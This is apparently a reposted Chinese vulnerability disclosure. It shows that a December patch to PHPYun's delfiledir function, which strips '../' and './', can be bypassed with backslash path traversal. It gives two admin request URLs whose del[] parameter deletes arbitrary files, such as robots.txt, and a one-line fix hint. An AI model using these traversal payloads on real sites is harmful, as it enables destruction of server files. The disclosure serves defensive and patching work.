27日补丁后,PHPYun依然存在任意文件删除 漏洞 12月27日,官方出了补丁: 在action.class.php的delfiledir函数中加入了替换../和./
function delfiledir($delfiles){
$delfiles = str_replace("../","",$delfiles);
$delfiles = str_replace("./","",$delfiles);
$delfiles = "../".$delfiles;
那么我们有别的方法可以绕过: (发现wooyun会把一个反斜杠变成两个…… \-->\\) 方法:改为 ..\/..\/robots.txt 或者直接 ..\..\robots.txt 地点一: 提交地址: http://localhost/phpyun/admin/index.php?C=del&M=user_member&delsub=1&del[]=..\/..\/robots.txt 通过修改del[]参数,可删除任意文件 地点二: 提交地址: http://localhost/phpyun/admin/index.php?C=del&M=com_member&delsub=1&del[]=..\/..\/robots.txt 通过修改del[]参数,可删除任意文件 问题文件分别是/admin/model/com_member.class.php 和 /admin/model/user_member.class.php |
修复方案: 要不改正则 -
上一篇: 腾讯某群功能xs - 网站安全 - 自学php
下一篇: 记事狗微博全版本注册管理员漏洞 - 网站安全
还没有人抢沙发呢~